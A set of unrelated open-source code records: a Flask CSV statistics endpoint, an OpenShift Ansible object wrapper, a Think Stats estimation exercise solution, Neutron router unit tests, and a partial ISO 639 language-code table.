from collections import deque
from streck import app
from streck.models.stats import *
from streck.models.product import *
from flask import render_template, Response, stream_with_context
@app.route('/stats')
def stats():
return render_template('stats.html', stats=Stats, categories=Product.categories())
@app.route('/stats/timeseries.csv')
def csvseries():
def generate():
series = Stats.timeseries()
categories = []
categoryhistory = []
data = {}
for row in series:
if not row[1] in categories:
categories.append(row[1])
categoryhistory.append(deque([0.0] * 7))
for row in series:
if not row[0] in data.keys():
data[row[0]] = [0.0] * (categories.__len__() * 2 + 1)
idx = categories.index(row[1])
data[row[0]][idx] = row[2]
yield 'Datum,%s,%s,Glidmedel summa\n' % (','.join(categories), ','.join(['Glidmedel ' + c for c in categories]))
for date in sorted(data.iterkeys()):
for idx, cat in enumerate(categories):
categoryhistory[idx].popleft()
categoryhistory[idx].append(data[date][idx])
data[date][2 + idx] = sum(categoryhistory[idx]) / 7
data[date][4] = data[date][2] + data[date][3]
yield '%s,%s\n' % (date, ','.join(['%10.3f' % s for s in data[date]]))
return Response(stream_with_context(generate()), mimetype='text/csv')
| isc |
EricMountain-1A/openshift-ansible | roles/lib_openshift/src/class/oc_obj.py | 16 | 7575 | # pylint: skip-file
# flake8: noqa
# pylint: disable=too-many-instance-attributes
class OCObject(OpenShiftCLI):
''' Class to wrap the oc command line tools '''
# pylint allows 5. we need 6
# pylint: disable=too-many-arguments
def __init__(self,
kind,
namespace,
name=None,
selector=None,
kubeconfig='/etc/origin/master/admin.kubeconfig',
verbose=False,
all_namespaces=False):
''' Constructor for OpenshiftOC '''
super(OCObject, self).__init__(namespace, kubeconfig=kubeconfig, verbose=verbose,
all_namespaces=all_namespaces)
self.kind = kind
self.name = name
self.selector = selector
def get(self):
'''return a kind by name '''
results = self._get(self.kind, name=self.name, selector=self.selector)
if (results['returncode'] != 0 and 'stderr' in results and
'\"{}\" not found'.format(self.name) in results['stderr']):
results['returncode'] = 0
return results
def delete(self):
'''delete the object'''
results = self._delete(self.kind, name=self.name, selector=self.selector)
if (results['returncode'] != 0 and 'stderr' in results and
'\"{}\" not found'.format(self.name) in results['stderr']):
results['returncode'] = 0
return results
def create(self, files=None, content=None):
'''
Create a config
NOTE: This creates the first file OR the first conent.
TODO: Handle all files and content passed in
'''
if files:
return self._create(files[0])
# pylint: disable=no-member
# The purpose of this change is twofold:
# - we need a check to only use the ruamel specific dumper if ruamel is loaded
# - the dumper or the flow style change is needed so openshift is able to parse
# the resulting yaml, at least until gopkg.in/yaml.v2 is updated
if hasattr(yaml, 'RoundTripDumper'):
content['data'] = yaml.dump(content['data'], Dumper=yaml.RoundTripDumper)
else:
content['data'] = yaml.safe_dump(content['data'], default_flow_style=False)
content_file = Utils.create_tmp_files_from_contents(content)[0]
return self._create(content_file['path'])
# pylint: disable=too-many-function-args
def update(self, files=None, content=None, force=False):
'''update a current openshift object
This receives a list of file names or content
and takes the first and calls replace.
TODO: take an entire list
'''
if files:
return self._replace(files[0], force)
if content and 'data' in content:
content = content['data']
return self.update_content(content, force)
def update_content(self, content, force=False):
'''update an object through using the content param'''
return self._replace_content(self.kind, self.name, content, force=force)
def needs_update(self, files=None, content=None, content_type='yaml'):
''' check to see if we need to update '''
objects = self.get()
if objects['returncode'] != 0:
return objects
data = None
if files:
data = Utils.get_resource_file(files[0], content_type)
elif content and 'data' in content:
data = content['data']
else:
data = content
# if equal then no need. So not equal is True
return not Utils.check_def_equal(data, objects['results'][0], skip_keys=None, debug=False)
# pylint: disable=too-many-return-statements,too-many-branches
@staticmethod
def run_ansible(params, check_mode=False):
'''perform the ansible idempotent code'''
ocobj = OCObject(params['kind'],
params['namespace'],
params['name'],
params['selector'],
kubeconfig=params['kubeconfig'],
verbose=params['debug'],
all_namespaces=params['all_namespaces'])
state = params['state']
api_rval = ocobj.get()
#####
# Get
#####
if state == 'list':
return {'changed': False, 'results': api_rval, 'state': state}
########
# Delete
########
if state == 'absent':
# verify its not in our results
if (params['name'] is not None or params['selector'] is not None) and \
(len(api_rval['results']) == 0 or \
('items' in api_rval['results'][0] and len(api_rval['results'][0]['items']) == 0)):
return {'changed': False, 'state': state}
if check_mode:
return {'changed': True, 'msg': 'CHECK_MODE: Would have performed a delete'}
api_rval = ocobj.delete()
if api_rval['returncode'] != 0:
return {'failed': True, 'msg': api_rval}
return {'changed': True, 'results': api_rval, 'state': state}
# create/update: Must define a name beyond this point
if not params['name']:
return {'failed': True, 'msg': 'Please specify a name when state is present.'}
if state == 'present':
########
# Create
########
if not Utils.exists(api_rval['results'], params['name']):
if check_mode:
return {'changed': True, 'msg': 'CHECK_MODE: Would have performed a create'}
# Create it here
api_rval = ocobj.create(params['files'], params['content'])
if api_rval['returncode'] != 0:
return {'failed': True, 'msg': api_rval}
# return the created object
api_rval = ocobj.get()
if api_rval['returncode'] != 0:
return {'failed': True, 'msg': api_rval}
# Remove files
if params['files'] and params['delete_after']:
Utils.cleanup(params['files'])
return {'changed': True, 'results': api_rval, 'state': state}
########
# Update
########
# if a file path is passed, use it.
update = ocobj.needs_update(params['files'], params['content'])
if not isinstance(update, bool):
return {'failed': True, 'msg': update}
# No changes
if not update:
if params['files'] and params['delete_after']:
Utils.cleanup(params['files'])
return {'changed': False, 'results': api_rval['results'][0], 'state': state}
if check_mode:
return {'changed': True, 'msg': 'CHECK_MODE: Would have performed an update.'}
api_rval = ocobj.update(params['files'],
params['content'],
params['force'])
if api_rval['returncode'] != 0:
return {'failed': True, 'msg': api_rval}
# return the created object
api_rval = ocobj.get()
if api_rval['returncode'] != 0:
return {'failed': True, 'msg': api_rval}
return {'changed': True, 'results': api_rval, 'state': state}
| apache-2.0 |
juoceano/ThinkStats2 | code/chap08soln.py | 65 | 6172 | """This file contains code used in "Think Stats",
by Allen B. Downey, available from greenteapress.com
Copyright 2014 Allen B. Downey
License: GNU GPLv3 http://www.gnu.org/licenses/gpl.html
"""
from __future__ import print_function
import thinkstats2
import thinkplot
import math
import random
import numpy as np
from scipy import stats
from estimation import RMSE, MeanError
"""This file contains a solution to exercises in Think Stats:
Exercise 8.1
In this chapter we used $\xbar$ and median to estimate $\mu$, and
found that $\xbar$ yields lower MSE.
Also, we used $S^2$ and $S_{n-1}^2$ to estimate $\sigma$, and found that
$S^2$ is biased and $S_{n-1}^2$ unbiased.
Run similar experiments to see if $\xbar$ and median are biased estimates
of $\mu$.
Also check whether $S^2$ or $S_{n-1}^2$ yields a lower MSE.
My conclusions:
1) xbar and median yield lower mean error as m increases, so neither
one is obviously biased, as far as we can tell from the experiment.
2) The biased estimator of variance yields lower RMSE than the unbiased
estimator, by about 10%. And the difference holds up as m increases.
Exercise 8.2
Suppose you draw a sample with size $n=10$ from a population
with an exponential disrtribution with $\lambda=2$. Simulate
this experiment 1000 times and plot the sampling distribution of
the estimate $\lamhat$. Compute the standard error of the estimate
and the 90\% confidence interval.
Repeat the experiment with a few different values of $n$ and make
a plot of standard error versus $n$.
1) With sample size 10:
standard error 0.896717911545
confidence interval (1.2901330772324622, 3.8692334892427911)
2) As sample size increases, standard error and the width of
the CI decrease:
10 0.90 (1.3, 3.9)
100 0.21 (1.7, 2.4)
1000 0.06 (1.9, 2.1)
All three confidence intervals contain the actual value, 2.
Exercise 8.3
In games like hockey and soccer, the time between goals is
roughly exponential. So you could estimate a team's goal-scoring rate
by observing the number of goals they score in a game. This
estimation process is a little different from sampling the time
between goals, so let's see how it works.
Write a function that takes a goal-scoring rate, {\tt lam}, in goals
per game, and simulates a game by generating the time between goals
until the total time exceeds 1 game, then returns the number of goals
scored.
Write another function that simulates many games, stores the
estimates of {\tt lam}, then computes their mean error and RMSE.
Is this way of making an estimate biased? Plot the sampling
distribution of the estimates and the 90\% confidence interval. What
is the standard error? What happens to sampling error for increasing
values of {\tt lam}?
My conclusions:
1) RMSE for this way of estimating lambda is 1.4
2) The mean error is small and decreases with m, so this estimator
appears to be unbiased.
One note: If the time between goals is exponential, the distribution
of goals scored in a game is Poisson.
See https://en.wikipedia.org/wiki/Poisson_distribution
"""
def Estimate1(n=7, m=100000):
"""Mean error for xbar and median as estimators of population mean.
n: sample size
m: number of iterations
"""
mu = 0
sigma = 1
means = []
medians = []
for _ in range(m):
xs = [random.gauss(mu, sigma) for i in range(n)]
xbar = np.mean(xs)
median = np.median(xs)
means.append(xbar)
medians.append(median)
print('Experiment 1')
print('mean error xbar', MeanError(means, mu))
print('mean error median', MeanError(medians, mu))
def Estimate2(n=7, m=100000):
"""RMSE for biased and unbiased estimators of population variance.
n: sample size
m: number of iterations
"""
mu = 0
sigma = 1
estimates1 = []
estimates2 = []
for _ in range(m):
xs = [random.gauss(mu, sigma) for i in range(n)]
biased = np.var(xs)
unbiased = np.var(xs, ddof=1)
estimates1.append(biased)
estimates2.append(unbiased)
print('Experiment 2')
print('RMSE biased', RMSE(estimates1, sigma**2))
print('RMSE unbiased', RMSE(estimates2, sigma**2))
def SimulateSample(lam=2, n=10, m=1000):
"""Sampling distribution of L as an estimator of exponential parameter.
lam: parameter of an exponential distribution
n: sample size
m: number of iterations
"""
def VertLine(x, y=1):
thinkplot.Plot([x, x], [0, y], color='0.8', linewidth=3)
estimates = []
for j in range(m):
xs = np.random.exponential(1.0/lam, n)
lamhat = 1.0 / np.mean(xs)
estimates.append(lamhat)
stderr = RMSE(estimates, lam)
print('standard error', stderr)
cdf = thinkstats2.Cdf(estimates)
ci = cdf.Percentile(5), cdf.Percentile(95)
print('confidence interval', ci)
VertLine(ci[0])
VertLine(ci[1])
# plot the CDF
thinkplot.Cdf(cdf)
thinkplot.Save(root='estimation2',
xlabel='estimate',
ylabel='CDF',
title='Sampling distribution')
return stderr
def SimulateGame(lam):
"""Simulates a game and returns the estimated goal-scoring rate.
lam: actual goal scoring rate in goals per game
"""
goals = 0
t = 0
while True:
time_between_goals = random.expovariate(lam)
t += time_between_goals
if t > 1:
break
goals += 1
# estimated goal-scoring rate is the actual number of goals scored
L = goals
return L
def Estimate4(lam=2, m=1000000):
estimates = []
for i in range(m):
L = SimulateGame(lam)
estimates.append(L)
print('Experiment 4')
print('rmse L', RMSE(estimates, lam))
print('mean error L', MeanError(estimates, lam))
pmf = thinkstats2.Pmf(estimates)
thinkplot.Hist(pmf)
thinkplot.Show()
def main():
thinkstats2.RandomSeed(17)
Estimate1()
Estimate2()
print('Experiment 3')
for n in [10, 100, 1000]:
stderr = SimulateSample(n=n)
print(n, stderr)
Estimate4()
if __name__ == '__main__':
main()
| gpl-3.0 |
cloudbase/neutron | neutron/tests/unit/objects/test_router.py | 1 | 2160 | # Copyright (c) 2016 Intel Corporation.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from neutron.objects import router
from neutron.tests.unit.objects import test_base as obj_test_base
from neutron.tests.unit import testlib_api
class RouterRouteIfaceObjectTestCase(
obj_test_base.BaseObjectIfaceTestCase):
_test_class = router.RouterRoute
class RouterRouteDbObjectTestCase(obj_test_base.BaseDbObjectTestCase,
testlib_api.SqlTestCase):
_test_class = router.RouterRoute
def setUp(self):
super(RouterRouteDbObjectTestCase, self).setUp()
for db_obj, obj_field, obj in zip(
self.db_objs, self.obj_fields, self.objs):
self._create_test_router()
db_obj['router_id'] = self._router['id']
obj_field['router_id'] = self._router['id']
obj['router_id'] = self._router['id']
class RouterExtraAttrsIfaceObjTestCase(obj_test_base.
BaseObjectIfaceTestCase):
_test_class = router.RouterExtraAttributes
class RouterExtraAttrsDbObjTestCase(obj_test_base.BaseDbObjectTestCase,
testlib_api.SqlTestCase):
_test_class = router.RouterExtraAttributes
def setUp(self):
super(RouterExtraAttrsDbObjTestCase, self).setUp()
for db_obj, obj_field, obj in zip(
self.db_objs, self.obj_fields, self.objs):
self._create_test_router()
db_obj['router_id'] = self._router['id']
obj_field['router_id'] = self._router['id']
obj['router_id'] = self._router['id']
| apache-2.0 |
BlackPole/bp-enigma2 | lib/python/Tools/ISO639.py | 79 | 23367 | # -*- coding: iso-8859-2 -*-
LanguageCodes = { }
LanguageCodes["aar"] = LanguageCodes["aa"] = ("Afar", "Hamitic")
LanguageCodes["abk"] = LanguageCodes["ab"] = ("Abkhazian", "Ibero-caucasian")
LanguageCodes["ace"] = ("Achinese", "")
LanguageCodes["ach"] = ("Acoli", "")
LanguageCodes["ada"] = ("Adangme", "")
LanguageCodes["afa"] = ("Afro-Asiatic (Other)", "")
LanguageCodes["afh"] = ("Afrihili", "")
LanguageCodes["afr"] = LanguageCodes["af"] = ("Afrikaans", "Germanic")
LanguageCodes["aka"] = ("Akan", "")
LanguageCodes["akk"] = ("Akkadian", "")
LanguageCodes["ale"] = ("Aleut", "")
LanguageCodes["alg"] = ("Algonquian languages", "")
LanguageCodes["amh"] = LanguageCodes["am"] = ("Amharic", "Semitic")
LanguageCodes["ang"] = ("English, Old (ca. 450-1100)", "")
LanguageCodes["apa"] = ("Apache languages", "")
LanguageCodes["ara"] = LanguageCodes["ar"] = ("Arabic", "Semitic")
LanguageCodes["arc"] = ("Aramaic", "")
LanguageCodes["arn"] = ("Araucanian", "")
LanguageCodes["arp"] = ("Arapaho", "")
LanguageCodes["art"] = ("Artificial (Other)", "")
LanguageCodes["arw"] = ("Arawak", "")
LanguageCodes["asm"] = LanguageCodes["as"] = ("Assamese", "Indian")
LanguageCodes["ath"] = ("Athapascan languages", "")
LanguageCodes["aus"] = ("Australian languages", "")
LanguageCodes["ava"] = ("Avaric", "")
LanguageCodes["ave"] = LanguageCodes["ae"] = ("Avestan", "")
LanguageCodes["awa"] = ("Awadhi", "")
LanguageCodes["aym"] = LanguageCodes["ay"] = ("Aymara", "Amerindian")
LanguageCodes["aze"] = LanguageCodes["az"] = ("Azerbaijani", "Turkic/altaic")
LanguageCodes["bad"] = ("Banda", "")
LanguageCodes["bai"] = ("Bamileke languages", "")
LanguageCodes["bak"] = LanguageCodes["ba"] = ("Bashkir", "Turkic/altaic")
LanguageCodes["bal"] = ("Baluchi", "")
LanguageCodes["bam"] = ("Bambara", "")
LanguageCodes["ban"] = ("Balinese", "")
LanguageCodes["bas"] = ("Basa", "")
LanguageCodes["bat"] = ("Baltic (Other)", "")
LanguageCodes["bej"] = ("Beja", "")
LanguageCodes["bel"] = LanguageCodes["be"] = ("Belarusian", "Slavic")
LanguageCodes["bem"] = ("Bemba", "")
LanguageCodes["ben"] = LanguageCodes["bn"] = ("Bengali", "Indian")
LanguageCodes["ber"] = ("Berber (Other)", "")
LanguageCodes["bho"] = ("Bhojpuri", "")
LanguageCodes["bih"] = LanguageCodes["bh"] = ("Bihari", "Indian")
LanguageCodes["bik"] = ("Bikol", "")
LanguageCodes["bin"] = ("Bini", "")
LanguageCodes["bis"] = LanguageCodes["bi"] = ("Bislama", "")
LanguageCodes["bla"] = ("Siksika", "")
LanguageCodes["bnt"] = ("Bantu (Other)", "")
LanguageCodes["bod"] = LanguageCodes["tib"] = LanguageCodes["bo"] = ("Tibetan", "Asian")
LanguageCodes["bos"] = LanguageCodes["bs"] = ("Bosnian", "")
LanguageCodes["bra"] = ("Braj", "")
LanguageCodes["bre"] = LanguageCodes["br"] = ("Breton", "Celtic")
LanguageCodes["btk"] = ("Batak (Indonesia)", "")
LanguageCodes["bua"] = ("Buriat", "")
LanguageCodes["bug"] = ("Buginese", "")
LanguageCodes["bul"] = LanguageCodes["bg"] = ("Bulgarian", "Slavic")
LanguageCodes["cad"] = ("Caddo", "")
LanguageCodes["cai"] = ("Central American Indian (Other)", "")
LanguageCodes["car"] = ("Carib", "")
LanguageCodes["cat"] = LanguageCodes["ca"] = ("Catalan", "Romance")
LanguageCodes["cau"] = ("Caucasian (Other)", "")
LanguageCodes["ceb"] = ("Cebuano", "")
LanguageCodes["cel"] = ("Celtic (Other)", "")
LanguageCodes["ces"] = LanguageCodes["cze"] = LanguageCodes["cs"] = ("Czech", "Slavic")
LanguageCodes["cha"] = LanguageCodes["ch"] = ("Chamorro", "")
LanguageCodes["chb"] = ("Chibcha", "")
LanguageCodes["che"] = LanguageCodes["ce"] = ("Chechen", "")
LanguageCodes["chg"] = ("Chagatai", "")
LanguageCodes["chk"] = ("Chuukese", "")
LanguageCodes["chm"] = ("Mari", "")
LanguageCodes["chn"] = ("Chinook jargon", "")
LanguageCodes["cho"] = ("Choctaw", "")
LanguageCodes["chp"] = ("Chipewyan", "")
LanguageCodes["chr"] = ("Cherokee", "")
LanguageCodes["chu"] = LanguageCodes["cu"] = ("Church Slavic", "")
LanguageCodes["chv"] = LanguageCodes["cv"] = ("Chuvash", "")
LanguageCodes["chy"] = ("Cheyenne", "")
LanguageCodes["cmc"] = ("Chamic languages", "")
LanguageCodes["cop"] = ("Coptic", "")
LanguageCodes["cor"] = LanguageCodes["kw"] = ("Cornish", "")
LanguageCodes["cos"] = LanguageCodes["co"] = ("Corsican", "Romance")
LanguageCodes["cpe"] = ("Creoles and pidgins, English based (Other)", "")
LanguageCodes["cpf"] = ("Creoles and pidgins, French-based (Other)", "")
LanguageCodes["cpp"] = ("Creoles and pidgins, Portuguese-based (Other)", "")
LanguageCodes["cre"] = ("Cree", "")
LanguageCodes["crp"] = ("Creoles and pidgins (Other)", "")
LanguageCodes["cus"] = ("Cushitic (Other)", "")
LanguageCodes["cym"] = LanguageCodes["wel"] = LanguageCodes["cy"] = ("Welsh", "Celtic")
LanguageCodes["dak"] = ("Dakota", "")
LanguageCodes["dan"] = LanguageCodes["da"] = ("Danish", "Germanic")
LanguageCodes["day"] = ("Dayak", "")
LanguageCodes["del"] = ("Delaware", "")
LanguageCodes["den"] = ("Slave (Athapascan)", "")
LanguageCodes["deu"] = LanguageCodes["ger"] = LanguageCodes["de"] = ("German", "Germanic")
LanguageCodes["dgr"] = ("Dogrib", "")
LanguageCodes["din"] = ("Dinka", "")
LanguageCodes["div"] = ("Divehi", "")
LanguageCodes["doi"] = ("Dogri", "")
LanguageCodes["dra"] = ("Dravidian (Other)", "")
LanguageCodes["dua"] = ("Duala", "")
LanguageCodes["dum"] = ("Dutch, Middle (ca. 1050-1350)", "")
LanguageCodes["dyu"] = ("Dyula", "")
LanguageCodes["dzo"] = LanguageCodes["dz"] = ("Dzongkha", "Asian")
LanguageCodes["efi"] = ("Efik", "")
LanguageCodes["egy"] = ("Egyptian (Ancient)", "")
LanguageCodes["eka"] = ("Ekajuk", "")
LanguageCodes["ell"] = LanguageCodes["gre"] = LanguageCodes["el"] = ("Greek, Modern (1453-)", "Latin/greek")
LanguageCodes["elx"] = ("Elamite", "")
LanguageCodes["eng"] = LanguageCodes["en"] = ("English", "Germanic")
LanguageCodes["enm"] = ("English, Middle (1100-1500)", "")
LanguageCodes["epo"] = LanguageCodes["eo"] = ("Esperanto", "International aux.")
LanguageCodes["est"] = LanguageCodes["et"] = ("Estonian", "Finno-ugric")
LanguageCodes["eus"] = LanguageCodes["baq"] = LanguageCodes["eu"] = ("Basque", "Basque")
LanguageCodes["ewe"] = ("Ewe", "")
LanguageCodes["ewo"] = ("Ewondo", "")
LanguageCodes["fan"] = ("Fang", "")
LanguageCodes["fao"] = LanguageCodes["fo"] = ("Faroese", "Germanic")
LanguageCodes["fas"] = LanguageCodes["per"] = LanguageCodes["fa"] = ("Persian", "")
LanguageCodes["fat"] = ("Fanti", "")
LanguageCodes["fij"] = LanguageCodes["fj"] = ("Fijian", "Oceanic/indonesian")
LanguageCodes["fin"] = LanguageCodes["fi"] = ("Finnish", "Finno-ugric")
LanguageCodes["fiu"] = ("Finno-Ugrian (Other)", "")
LanguageCodes["fon"] = ("Fon", "")
LanguageCodes["fra"] = LanguageCodes["fre"] = LanguageCodes["fr"] = ("French", "Romance")
LanguageCodes["frm"] = ("French, Middle (ca. 1400-1600)", "")
LanguageCodes["fro"] = ("French, Old (842-ca. 1400)", "")
LanguageCodes["fry"] = LanguageCodes["fy"] = ("Frisian", "Germanic")
LanguageCodes["ful"] = ("Fulah", "")
LanguageCodes["fur"] = ("Friulian", "")
LanguageCodes["gaa"] = ("Ga", "")
LanguageCodes["gay"] = ("Gayo", "")
LanguageCodes["gba"] = ("Gbaya", "")
LanguageCodes["gem"] = ("Germanic (Other)", "")
LanguageCodes["gez"] = ("Geez", "")
LanguageCodes["gil"] = ("Gilbertese", "")
LanguageCodes["gla"] = LanguageCodes["gd"] = ("Gaelic (Scots)", "Celtic")
LanguageCodes["gle"] = LanguageCodes["ga"] = ("Irish", "Celtic")
LanguageCodes["glg"] = LanguageCodes["gl"] = ("Gallegan", "Romance")
LanguageCodes["glv"] = LanguageCodes["gv"] = ("Manx", "")
LanguageCodes["gmh"] = ("German, Middle High (ca. 1050-1500)", "")
LanguageCodes["goh"] = ("German, Old High (ca. 750-1050)", "")
LanguageCodes["gon"] = ("Gondi", "")
LanguageCodes["gor"] = ("Gorontalo", "")
LanguageCodes["got"] = ("Gothic", "")
LanguageCodes["grb"] = ("Grebo", "")
LanguageCodes["grc"] = ("Greek, Ancient (to 1453)", "")
LanguageCodes["grn"] = LanguageCodes["gn"] = ("Guarani", "Amerindian")
LanguageCodes["guj"] = LanguageCodes["gu"] = ("Gujarati", "Indian")
LanguageCodes["gwi"] = ("Gwich´in", "")
LanguageCodes["hai"] = ("Haida", "")
LanguageCodes["hau"] = LanguageCodes["ha"] = ("Hausa", "Negro-african")
LanguageCodes["haw"] = ("Hawaiian", "")
LanguageCodes["heb"] = LanguageCodes["he"] = ("Hebrew", "")
LanguageCodes["her"] = LanguageCodes["hz"] = ("Herero", "")
LanguageCodes["hil"] = ("Hiligaynon", "")
LanguageCodes["him"] = ("Himachali", "")
LanguageCodes["hin"] = LanguageCodes["hi"] = ("Hindi", "Indian")
LanguageCodes["hit"] = ("Hittite", "")
LanguageCodes["hmn"] = ("Hmong", "")
LanguageCodes["hmo"] = LanguageCodes["ho"] = ("Hiri Motu", "")
LanguageCodes["hrv"] = LanguageCodes["scr"] = LanguageCodes["hr"] = ("Croatian", "Slavic")
LanguageCodes["hun"] = LanguageCodes["hu"] = ("Hungarian", "Finno-ugric")
LanguageCodes["hup"] = ("Hupa", "")
LanguageCodes["hye"] = LanguageCodes["arm"] = LanguageCodes["hy"] = ("Armenian", "Indo-european (other)")
LanguageCodes["iba"] = ("Iban", "")
LanguageCodes["ibo"] = ("Igbo", "")
LanguageCodes["ijo"] = ("Ijo", "")
LanguageCodes["iku"] = LanguageCodes["iu"] = ("Inuktitut", "")
LanguageCodes["ile"] = LanguageCodes["ie"] = ("Interlingue", "International aux.")
LanguageCodes["ilo"] = ("Iloko", "")
LanguageCodes["ina"] = LanguageCodes["ia"] = ("Interlingua (International Auxiliary Language Association)", "International aux.")
LanguageCodes["inc"] = ("Indic (Other)", "")
LanguageCodes["ind"] = LanguageCodes["id"] = ("Indonesian", "")
LanguageCodes["ine"] = ("Indo-European (Other)", "")
LanguageCodes["ipk"] = LanguageCodes["ik"] = ("Inupiaq", "Eskimo")
LanguageCodes["ira"] = ("Iranian (Other)", "")
LanguageCodes["iro"] = ("Iroquoian languages", "")
LanguageCodes["isl"] = LanguageCodes["ice"] = LanguageCodes["is"] = ("Icelandic", "Germanic")
LanguageCodes["ita"] = LanguageCodes["it"] = ("Italian", "Romance")
LanguageCodes["jaw"] = LanguageCodes["jav"] = LanguageCodes["jw"] = ("Javanese", "")
LanguageCodes["jpn"] = LanguageCodes["ja"] = ("Japanese", "Asian")
LanguageCodes["jpr"] = ("Judeo-Persian", "")
LanguageCodes["kaa"] = ("Kara-Kalpak", "")
LanguageCodes["kab"] = ("Kabyle", "")
LanguageCodes["kac"] = ("Kachin", "")
LanguageCodes["kal"] = LanguageCodes["kl"] = ("Kalaallisut", "Eskimo")
LanguageCodes["kam"] = ("Kamba", "")
LanguageCodes["kan"] = LanguageCodes["kn"] = ("Kannada", "Dravidian")
LanguageCodes["kar"] = ("Karen", "")
LanguageCodes["kas"] = LanguageCodes["ks"] = ("Kashmiri", "Indian")
LanguageCodes["kat"] = LanguageCodes["geo"] = LanguageCodes["ka"] = ("Georgian", "Ibero-caucasian")
LanguageCodes["kau"] = ("Kanuri", "")
LanguageCodes["kaw"] = ("Kawi", "")
LanguageCodes["kaz"] = LanguageCodes["kk"] = ("Kazakh", "Turkic/altaic")
LanguageCodes["kha"] = ("Khasi", "")
LanguageCodes["khi"] = ("Khoisan (Other)", "")
LanguageCodes["khm"] = LanguageCodes["km"] = ("Khmer", "Asian")
LanguageCodes["kho"] = ("Khotanese", "")
LanguageCodes["kik"] = LanguageCodes["ki"] = ("Kikuyu", "")
LanguageCodes["kin"] = LanguageCodes["rw"] = ("Kinyarwanda", "Negro-african")
LanguageCodes["kir"] = LanguageCodes["ky"] = ("Kirghiz", "Turkic/altaic")
LanguageCodes["kmb"] = ("Kimbundu", "")
LanguageCodes["kok"] = ("Konkani", "")
LanguageCodes["kom"] = LanguageCodes["kv"] = ("Komi", "")
LanguageCodes["kon"] = ("Kongo", "")
LanguageCodes["kor"] = LanguageCodes["ko"] = ("Korean", "Asian")
LanguageCodes["kos"] = ("Kosraean", "")
LanguageCodes["kpe"] = ("Kpelle", "")
LanguageCodes["kro"] = ("Kru", "")
LanguageCodes["kru"] = ("Kurukh", "")
LanguageCodes["kum"] = ("Kumyk", "")
LanguageCodes["kur"] = LanguageCodes["ku"] = ("Kurdish", "Iranian")
LanguageCodes["kut"] = ("Kutenai", "")
LanguageCodes["lad"] = ("Ladino", "")
LanguageCodes["lah"] = ("Lahnda", "")
LanguageCodes["lam"] = ("Lamba", "")
LanguageCodes["lao"] = LanguageCodes["lo"] = ("Lao", "Asian")
LanguageCodes["lat"] = LanguageCodes["la"] = ("Latin", "Latin/greek")
LanguageCodes["lav"] = LanguageCodes["lv"] = ("Latvian", "Baltic")
LanguageCodes["lez"] = ("Lezghian", "")
LanguageCodes["lin"] = LanguageCodes["ln"] = ("Lingala", "Negro-african")
LanguageCodes["lit"] = LanguageCodes["lt"] = ("Lithuanian", "Baltic")
LanguageCodes["lol"] = ("Mongo", "")
LanguageCodes["loz"] = ("Lozi", "")
LanguageCodes["ltz"] = LanguageCodes["lb"] = ("Letzeburgesch", "")
LanguageCodes["lua"] = ("Luba-Lulua", "")
LanguageCodes["lub"] = ("Luba-Katanga", "")
LanguageCodes["lug"] = ("Ganda", "")
LanguageCodes["lui"] = ("Luiseno", "")
LanguageCodes["lun"] = ("Lunda", "")
LanguageCodes["luo"] = ("Luo (Kenya and Tanzania)", "")
LanguageCodes["lus"] = ("lushai", "")
LanguageCodes["mad"] = ("Madurese", "")
LanguageCodes["mag"] = ("Magahi", "")
LanguageCodes["mah"] = LanguageCodes["mh"] = ("Marshall", "")
LanguageCodes["mai"] = ("Maithili", "")
LanguageCodes["mak"] = ("Makasar", "")
LanguageCodes["mal"] = LanguageCodes["ml"] = ("Malayalam", "Dravidian")
LanguageCodes["man"] = ("Mandingo", "")
LanguageCodes["map"] = ("Austronesian (Other)", "")
LanguageCodes["mar"] = LanguageCodes["mr"] = ("Marathi", "Indian")
LanguageCodes["mas"] = ("Masai", "")
LanguageCodes["mdr"] = ("Mandar", "")
LanguageCodes["men"] = ("Mende", "")
LanguageCodes["mga"] = ("Irish, Middle (900-1200)", "")
LanguageCodes["mic"] = ("Micmac", "")
LanguageCodes["min"] = ("Minangkabau", "")
LanguageCodes["mis"] = ("Miscellaneous languages", "")
LanguageCodes["mkd"] = LanguageCodes["mac"] = LanguageCodes["mk"] = ("Macedonian", "Slavic")
LanguageCodes["mkh"] = ("Mon-Khmer (Other)", "")
LanguageCodes["mlg"] = LanguageCodes["mg"] = ("Malagasy", "Oceanic/indonesian")
LanguageCodes["mlt"] = LanguageCodes["mt"] = ("Maltese", "Semitic")
LanguageCodes["mnc"] = ("Manchu", "")
LanguageCodes["mni"] = ("Manipuri", "")
LanguageCodes["mno"] = ("Manobo languages", "")
LanguageCodes["moh"] = ("Mohawk", "")
LanguageCodes["mol"] = LanguageCodes["mo"] = ("Moldavian", "Romance")
LanguageCodes["mon"] = LanguageCodes["mn"] = ("Mongolian", "")
LanguageCodes["mos"] = ("Mossi", "")
LanguageCodes["mri"] = LanguageCodes["mao"] = LanguageCodes["mi"] = ("Maori", "Oceanic/indonesian")
LanguageCodes["msa"] = LanguageCodes["may"] = LanguageCodes["ms"] = ("Malay", "Oceanic/indonesian")
LanguageCodes["mul"] = ("Multiple languages", "")
LanguageCodes["mun"] = ("Munda languages", "")
LanguageCodes["mus"] = ("Creek", "")
LanguageCodes["mwr"] = ("Marwari", "")
LanguageCodes["mya"] = LanguageCodes["bur"] = LanguageCodes["my"] = ("Burmese", "Asian")
LanguageCodes["myn"] = ("Mayan languages", "")
LanguageCodes["nah"] = ("Nahuatl", "")
LanguageCodes["nai"] = ("North American Indian", "")
LanguageCodes["nau"] = LanguageCodes["na"] = ("Nauru", "")
LanguageCodes["nav"] = LanguageCodes["nv"] = ("Navajo", "")
LanguageCodes["nbl"] = LanguageCodes["nr"] = ("Ndebele, South", "")
LanguageCodes["nde"] = LanguageCodes["nd"] = ("Ndebele, North", "")
LanguageCodes["ndo"] = LanguageCodes["ng"] = ("Ndonga", "")
LanguageCodes["nds"] = ("Low German; Low Saxon; German, Low; Saxon, Low", "")
LanguageCodes["nep"] = LanguageCodes["ne"] = ("Nepali", "Indian")
LanguageCodes["new"] = ("Newari", "")
LanguageCodes["nia"] = ("Nias", "")
LanguageCodes["nic"] = ("Niger-Kordofanian (Other)", "")
LanguageCodes["niu"] = ("Niuean", "")
LanguageCodes["nld"] = LanguageCodes["dut"] = LanguageCodes["nl"] = ("Dutch", "Germanic")
